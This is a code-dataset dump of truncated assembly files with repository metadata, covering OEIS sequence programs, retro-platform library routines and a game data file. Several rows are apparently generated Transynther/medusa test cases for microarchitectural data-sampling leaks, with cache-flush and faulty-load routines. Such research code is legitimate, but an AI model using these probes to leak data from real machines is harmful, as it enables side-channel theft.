] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/086/A086148.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/086/A086148.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A086148: Sum of the orders of the elements in the dihedral group D_2n.
; 3,7,13,19,31,33,57,59,79,83,133,101,183,157,177,203,307,219,381,271,343,377,553,349,571,523,601,529,871,501,993,747,843,887,973,743,1407,1105,1177,983,1723,987,1893,1309,1371,1613,2257,1293,2199,1663,2013,1831,2863,1749,2441,1961,2515,2555,3541,... | 37.736842 | 451 | 0.698745 |
1f692f42615c7a6a2188c9c2cda7072976dd99f5 | 5,735 | asm | Assembly | Transynther/x86/_processed/NONE/_zr_/i3-7100_9_0x84_notsx.log_21829_2639.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_zr_/i3-7100_9_0x84_notsx.log_21829_2639.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_zr_/i3-7100_9_0x84_notsx.log_21829_2639.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r14
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x14d4c, %rsi
lea addresses_UC_ht+0x1b620, %rdi
clflush (%rdi)
nop
nop
nop
nop
inc %r14
mov $14, %rcx
rep movsq
nop
nop
and $36090, %rcx
pop %rsi
pop %rdi
pop %rcx
pop %r14
ret
.global s_faulty_load
s_faulty_loa... | 35.621118 | 2,999 | 0.656146 |
e5451fe11994588a48d3c24e12a069f6a07002ea | 556 | asm | Assembly | oeis/017/A017022.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/017/A017022.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/017/A017022.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A017022: a(n) = (7*n + 3)^6.
; 729,1000000,24137569,191102976,887503681,3010936384,8303765625,19770609664,42180533641,82653950016,151334226289,262144000000,433626201009,689869781056,1061520150601,1586874322944,2313060765625,3297303959104,4608273662721,6327518887936,8550986578849,11390625000000,14976071831449,19456426... | 79.428571 | 496 | 0.874101 |
1627317194a8d792bb0862963cf9f69f867cc17c | 8,257 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_969.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_969.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_969.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r14
push %r8
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x14566, %r8
nop
sub $6147, %r9
movl $0x61626364, (%r8)
nop
nop
xor $38847, %r14
lea addresses_normal_ht+0x24c6, %rcx
nop
nop
nop
nop
nop
cmp %r8, %r8
mov (%rcx), %r10d
nop
nop
... | 30.135036 | 2,999 | 0.650115 |
84f1aac5b1e26ef5c5686acc9e442664d4d630f7 | 601 | asm | Assembly | oeis/166/A166150.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/166/A166150.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/166/A166150.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A166150: a(n) = 5n^2 + 5n - 9.
; Submitted by Christian Krause
; 1,21,51,91,141,201,271,351,441,541,651,771,901,1041,1191,1351,1521,1701,1891,2091,2301,2521,2751,2991,3241,3501,3771,4051,4341,4641,4951,5271,5601,5941,6291,6651,7021,7401,7791,8191,8601,9021,9451,9891,10341,10801,11271,11751,12241,12741,13251,13771,143... | 66.777778 | 497 | 0.77371 |
418822a8902aa70752284e763b47e673ec89b9b0 | 380 | asm | Assembly | programs/oeis/138/A138019.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/138/A138019.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/138/A138019.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A138019: Period 5: repeat 1, 1, 0, -1, -1.
; 1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1,-1,1,1,0,-1
mod $0,5
mov $1,$0
add $1,$0
div $1... | 27.142857 | 238 | 0.457895 |
4bcdd6fbc1fbd80e4e9ae8891974d23987f5d75d | 702 | asm | Assembly | oeis/052/A052956.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/052/A052956.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/052/A052956.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A052956: a(n) = 2^n + Fibonacci(n+1).
; Submitted by Jamie Morken(s2)
; 2,3,6,11,21,40,77,149,290,567,1113,2192,4329,8569,16994,33755,67133,133656,266325,531053,1059522,2114863,4222961,8434976,16852241,33675825,67305282,134535539,268949685,537702952,1075088093,2149661957,4298491874,8595637479,17189096649,34374668720,... | 63.818182 | 498 | 0.794872 |
41db892d59dfee33f21faa48cecff4e18052dec3 | 449 | asm | Assembly | src/util/oli/qdos/rrtc.asm | olifink/qspread | d6403d210bdad9966af5d2a0358d4eed3f1e1c02 | [
"MIT"
] | null | null | null | src/util/oli/qdos/rrtc.asm | olifink/qspread | d6403d210bdad9966af5d2a0358d4eed3f1e1c02 | [
"MIT"
] | null | null | null | src/util/oli/qdos/rrtc.asm | olifink/qspread | d6403d210bdad9966af5d2a0358d4eed3f1e1c02 | [
"MIT"
] | null | null | null | ; read current time and date from real time clock
section utility
include win1_mac_oli
include win1_keys_qdos_sms
xdef ut_rrtc
;+++
; read current time and date from real time clock
;
; Entry Exit
; d1.l ... | 20.409091 | 63 | 0.489978 |
ff5efb119bf3f399e18f58890db6fd3d60fd5de1 | 1,803 | asm | Assembly | tests/lorenz/common/showregs.asm | rheit/yam6502 | 6e999758d816020139a64a10ec0ca2304e81b959 | [
"MIT"
] | null | null | null | tests/lorenz/common/showregs.asm | rheit/yam6502 | 6e999758d816020139a64a10ec0ca2304e81b959 | [
"MIT"
] | null | null | null | tests/lorenz/common/showregs.asm | rheit/yam6502 | 6e999758d816020139a64a10ec0ca2304e81b959 | [
"MIT"
] | null | null | null | ; this file is part of the C64 Emulator Test Suite. public domain, no copyright
; x/y - pointer to register dump
showregs
.block
stx 172
sty 173
ldy #0
lda (172),y
jsr printhb
lda #32
jsr cbmk_bsout
lda #32
jsr cbmk_bsout... | 17.504854 | 79 | 0.375485 |
1799695cd3f9dbb5b3a4422c10cddc229c59a95f | 1,503 | asm | Assembly | src/firmware/Platform/Clock/DaylightSavingsTime.asm | pete-restall/Cluck2Sesame-Prototype | 99119b6748847a7b6aeadc4bee42cbed726f7fdc | [
"MIT"
] | 1 | 2019-12-12T09:07:08.000Z | 2019-12-12T09:07:08.000Z | src/firmware/Platform/Clock/DaylightSavingsTime.asm | pete-restall/Cluck2Sesame-Prototype | 99119b6748847a7b6aeadc4bee42cbed726f7fdc | [
"MIT"
] | null | null | null | src/firmware/Platform/Clock/DaylightSavingsTime.asm | pete-restall/Cluck2Sesame-Prototype | 99119b6748847a7b6aeadc4bee42cbed726f7fdc | [
"MIT"
] | null | null | null | #define __CLUCK2SESAME_PLATFORM_CLOCK_ASM
#include "Platform.inc"
#include "FarCalls.inc"
#include "Flash.inc"
#include "ArithmeticBcd.inc"
#include "Clock.inc"
radix decimal
extern daylightSavingsTimeLookupTable
EARLIEST_FIRST_DAYLIGHT_SAVINGS_DAY equ 83
EARLIEST_LAST_DAYLIGHT_SAVINGS_DAY equ low(296)
Clo... | 17.892857 | 47 | 0.817698 |
216694bc6a45115009c1289c6fe772fa3ac245c9 | 404 | asm | Assembly | libsrc/enterprise/exos_read_block.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/enterprise/exos_read_block.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/enterprise/exos_read_block.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | ;
; Enterprise 64/128 specific routines
; by Stefano Bodrato, 2011
;
; exos_read_block(unsigned char channel, unsigned int byte_count, unsigned char *address);
;
;
; $Id: exos_read_block.asm,v 1.2 2015/01/19 01:32:42 pauloscustodio Exp $
;
PUBLIC exos_read_block
exos_read_block:
pop af
pop de
pop bc
pop hl
pu... | 13.032258 | 90 | 0.705446 |
e9c196ab85100f7e560f48aabfcde182eda8f43e | 401 | asm | Assembly | data/pokemon/base_stats/caterpie.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | 1 | 2022-02-15T00:19:44.000Z | 2022-02-15T00:19:44.000Z | data/pokemon/base_stats/caterpie.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | data/pokemon/base_stats/caterpie.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | db DEX_CATERPIE ; pokedex id
db 45, 30, 35, 45, 20
; hp atk def spd spc
db BUG, BUG ; type
db 255 ; catch rate
db 53 ; base exp
INCBIN "gfx/pokemon/front/caterpie.pic", 0, 1 ; sprite dimensions
dw CaterpiePicFront, CaterpiePicBack
db TACKLE, STRING_SHOT, NO_MOVE, NO_MOVE ; level 1 learnset
db G... | 19.095238 | 66 | 0.685786 |
5a32f004e3fac4d6e2880931c65a8091396e383a | 674 | asm | Assembly | oeis/117/A117868.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/117/A117868.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/117/A117868.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A117868: Number of palindromes (in base 9) below 9^n.
; Submitted by Jamie Morken(s4)
; 8,16,88,160,808,1456,7288,13120,65608,118096,590488,1062880,5314408,9565936,47829688,86093440,430467208,774840976,3874204888,6973568800,34867844008,62762119216,313810596088,564859072960,2824295364808,5083731656656,25418658283288,4... | 44.933333 | 489 | 0.832344 |
647145d3d653d2da6cf4dad7c5d6a5d1c45e02b9 | 578 | asm | Assembly | 284x-101.asm | karcherm/scsi_edd | 406005cbb172fb19671d0138016d189fac80857a | [
"MIT"
] | null | null | null | 284x-101.asm | karcherm/scsi_edd | 406005cbb172fb19671d0138016d189fac80857a | [
"MIT"
] | null | null | null | 284x-101.asm | karcherm/scsi_edd | 406005cbb172fb19671d0138016d189fac80857a | [
"MIT"
] | null | null | null | ResetLocalStateOfs = 0C80h
SetTargetOfs = 0CB4h
ExecuteCommandOfs = 0E6Bh
SetDataAddressOfs = 0F29h
Int13_DispatchOfs = 12B0h
I13_DispatcherOfs = 1453h
Func_UnsupportedOfs = 1483h
Func09_AlwaysOKOfs = 1792h
MyInt15Ofs = 18E8h
MyInt15InstallOfs = 2BB0h ; Not really. This function is missing,... | 26.272727 | 79 | 0.638408 |
b2745b3730566a946f4789cc2c5fbe44ee7c7e48 | 7,999 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2.log_943_492.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2.log_943_492.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2.log_943_492.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r14
push %r15
push %r9
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x3fe8, %r12
cmp $20278, %rdi
mov $0x6162636465666768, %r15
movq %r15, %xmm1
vmovups %ymm1, (%r12)
nop
xor %r10, %r10
lea addresses_D_ht+0x68bc, %r15
nop
nop
nop
nop
nop
in... | 31.868526 | 2,828 | 0.653457 |
c46809529a8e62a39acfeff0d01548cf01227e4f | 213 | asm | Assembly | libsrc/_DEVELOPMENT/z180/c/sdcc/z180_set_int_state_fastcall.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/z180/c/sdcc/z180_set_int_state_fastcall.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/z180/c/sdcc/z180_set_int_state_fastcall.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
; void z180_set_int_state_fastcall(uint state)
SECTION code_clib
SECTION code_z180
PUBLIC _z180_set_int_state_fastcall
EXTERN asm_z180_set_int_state
defc _z180_set_int_state_fastcall = asm_z180_set_int_state
| 17.75 | 58 | 0.882629 |
d931ebd9d4d10c06a2378676acb863bdce8e8df5 | 345 | asm | Assembly | libsrc/fcntl/zxvgs/rename.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | null | null | null | libsrc/fcntl/zxvgs/rename.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | null | null | null | libsrc/fcntl/zxvgs/rename.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | 1 | 2019-12-03T23:57:48.000Z | 2019-12-03T23:57:48.000Z | ;int rename(char *source, char *dest)
;returns 0 when OK
;
; $Id: rename.asm,v 1.3 2016/06/23 20:31:34 dom Exp $
;
SECTION code_clib
PUBLIC rename
PUBLIC _rename
.rename
._rename
POP BC
POP HL ;new filename
POP DE ;old
PUSH DE
PUSH HL
PUSH BC
RST 8
DEFB $CE ;also can move file to another path/disk...
AND ... | 13.8 | 53 | 0.678261 |
c1e554ed22a6bbebdfcae58e3679aadaff6446f8 | 938 | asm | Assembly | src/news.asm | BlockoS/up-news | 0f67eac47d36e5e71e403b22fb009633eec6d560 | [
"BSD-3-Clause"
] | 2 | 2017-03-18T21:38:08.000Z | 2017-03-20T18:48:56.000Z | src/news.asm | BlockoS/up-news | 0f67eac47d36e5e71e403b22fb009633eec6d560 | [
"BSD-3-Clause"
] | null | null | null | src/news.asm | BlockoS/up-news | 0f67eac47d36e5e71e403b22fb009633eec6d560 | [
"BSD-3-Clause"
] | null | null | null | ; sprites:
; - vignette (live)
; - channel name
; - left eye
; - right eye
; - mouth
; - left hand
; - right hand
;
; scroll:
; - breaking news ?
; - main news line
; - stock line
news:
; Clean BAT
vdc_reg #VDC_MAWR
vdc_data #$0000
vdc_reg #VD... | 18.038462 | 42 | 0.49467 |
5abe7291efd58454152aa7e1a3075c406a411750 | 2,852 | asm | Assembly | programs/oeis/017/A017003.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/017/A017003.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/017/A017003.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A017003: a(n) = (7*n + 1)^11.
; 1,8589934592,8649755859375,584318301411328,12200509765705829,131621703842267136,929293739471222707,4882812500000000000,20635899893042801193,73786976294838206464,231122292121701565271,650190514836423555072,1673432436896142578125,3996373778857415671808,8953382542587164451099,189829855833... | 407.428571 | 2,790 | 0.953366 |
9ad55196da81ea185b9fe9a73433fd3baf0bdce1 | 23 | asm | Assembly | tests/include_directory/code/code4.asm | NullMember/customasm | 6e34d6432583a41278e6b3596f1817ae82149531 | [
"Apache-2.0"
] | 414 | 2016-10-14T22:39:20.000Z | 2022-03-30T07:52:44.000Z | tests/include_directory/code/code4.asm | NullMember/customasm | 6e34d6432583a41278e6b3596f1817ae82149531 | [
"Apache-2.0"
] | 100 | 2018-03-22T16:12:24.000Z | 2022-03-26T09:19:23.000Z | tests/include_directory/code/code4.asm | NullMember/customasm | 6e34d6432583a41278e6b3596f1817ae82149531 | [
"Apache-2.0"
] | 47 | 2017-06-29T15:12:13.000Z | 2022-03-10T04:50:51.000Z | #include "../code3.asm" | 23 | 23 | 0.652174 |
916c0a20f05909cc355c785c5299bb71bf3182ae | 8,250 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_zr_un_sm_/i7-7700_9_0x48.log_21829_2419.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_zr_un_sm_/i7-7700_9_0x48.log_21829_2419.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_zr_un_sm_/i7-7700_9_0x48.log_21829_2419.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r13
push %r15
push %r9
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x139d, %r9
nop
nop
nop
nop
nop
mfence
mov (%r9), %r15d
nop
nop
nop
add $42339, %rsi
lea addresses_WT_ht+0x1e01d, %rcx
clflush (%rcx)
add $7526, %rsi
movups (%rcx), %xmm4
vpext... | 32.480315 | 2,999 | 0.651879 |
dea678cbd658ea8aa45fdc1dfe998ef3e3951706 | 2,229 | asm | Assembly | Day-46/Random_Num_Generate.asm | MasumBhai/50-Day-challenge-with-Assembly-Language | aadeb6c4a022d089afb10fd22ffd2a768c32036e | [
"CC0-1.0"
] | 1 | 2021-04-07T09:50:40.000Z | 2021-04-07T09:50:40.000Z | Day-46/Random_Num_Generate.asm | MasumBhai/50-Day-challenge-with-Assembly-Language | aadeb6c4a022d089afb10fd22ffd2a768c32036e | [
"CC0-1.0"
] | null | null | null | Day-46/Random_Num_Generate.asm | MasumBhai/50-Day-challenge-with-Assembly-Language | aadeb6c4a022d089afb10fd22ffd2a768c32036e | [
"CC0-1.0"
] | null | null | null | ; id-201914044 (problem no-05)
.model small
.stack 100h
;include 'emu8086.inc'
.data
n_line db 0ah,0dh,"$"
msg db "have to enter 16 digit binary number",10,13,"$"
var dw ?
.code
main proc
mov ax,@data
mov ds,ax
lea dx,msg
mov ah,9
int 21h
... | 17.414063 | 70 | 0.524899 |
a2a5e225965d32908d8d3d628336d60e67ccf2fc | 9,172 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca.log_21829_55.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca.log_21829_55.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca.log_21829_55.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r14
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_D_ht+0x6754, %r14
add %rdx, %rdx
mov (%r14), %rax
dec %r12
lea addresses_D_ht+0x7754, %rsi
lea addresses_A_ht+0xfc04, %rdi
nop
nop
nop
inc %r14
mov $118, %rcx
rep movsb
nop
nop
nop
... | 30.370861 | 2,999 | 0.657218 |
3b95d733c93770b2ff50e09d2a721b1dd20b2702 | 819 | asm | Assembly | oeis/124/A124320.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/124/A124320.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/124/A124320.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A124320: Triangle read by rows: T(n,k) = k!*binomial(n+k-1,k) (n>=0, 0<=k<=n), rising factorial power, Pochhammer's symbol.
; Submitted by Christian Krause
; 1,1,1,1,2,6,1,3,12,60,1,4,20,120,840,1,5,30,210,1680,15120,1,6,42,336,3024,30240,332640,1,7,56,504,5040,55440,665280,8648640,1,8,72,720,7920,95040,1235520,17297... | 39 | 493 | 0.715507 |
cee77a98dc938b0d31f33fd41373afdc721f188b | 4,684 | asm | Assembly | Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48.log_2_844.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48.log_2_844.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48.log_2_844.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r12
push %r9
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x10afa, %rdx
nop
and $35271, %r9
mov $0x6162636465666768, %r11
movq %r11, %xmm7
and $0xffffffffffffffc0, %rdx
movntdq %xmm7, (%rdx)
nop
xor %r10, %r10
lea addresses_D... | 21.388128 | 153 | 0.654355 |
977e1c1ae1791df0d35e5fb2d86e942f9442eb62 | 886 | asm | Assembly | libsrc/_DEVELOPMENT/target/zxn/driver/terminal/tshr_01_output_char_64/tshr_01_output_char_64_oterm_msg_printc.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/target/zxn/driver/terminal/tshr_01_output_char_64/tshr_01_output_char_64_oterm_msg_printc.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/target/zxn/driver/terminal/tshr_01_output_char_64/tshr_01_output_char_64_oterm_msg_printc.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z | SECTION code_driver
SECTION code_driver_terminal_output
PUBLIC tshr_01_output_char_64_oterm_msg_printc
EXTERN asm_tshr_cxy2saddr
tshr_01_output_char_64_oterm_msg_printc:
; enter : c = ascii code
; l = absolute x coordinate
; h = absolute y coordinate
; can use: af, bc, de,... | 15.821429 | 60 | 0.542889 |
268911526fa09d7a07930a563b427b9cc9d8c38b | 698 | asm | Assembly | evaluation/6_arch_vs_ct/violations/v1-ctr.asm | mguarnieri/revizor | a3d91b19d91bcc9a266b7f10e5b9631906ebfedd | [
"MIT"
] | null | null | null | evaluation/6_arch_vs_ct/violations/v1-ctr.asm | mguarnieri/revizor | a3d91b19d91bcc9a266b7f10e5b9631906ebfedd | [
"MIT"
] | null | null | null | evaluation/6_arch_vs_ct/violations/v1-ctr.asm | mguarnieri/revizor | a3d91b19d91bcc9a266b7f10e5b9631906ebfedd | [
"MIT"
] | null | null | null | .intel_syntax noprefix
.test_case_enter:
LEA R14, [R14 + 4] # instrumentation
MFENCE # instrumentation
.test_case_main:
.test_case_main.entry:
JMP .bb0
.bb0:
{store} ADC CX, CX
AND RAX, 0b0111111000000 # instrumentation
ADD RAX, R14 # instrumentation
CMOVNS EBX, dword ptr [RAX]
AND RCX, 0b0111111000000 # instrumentatio... | 23.266667 | 42 | 0.762178 |
c67db229adb7034067ce50a89f6f246d33533051 | 7,823 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_1050_2000.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_1050_2000.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
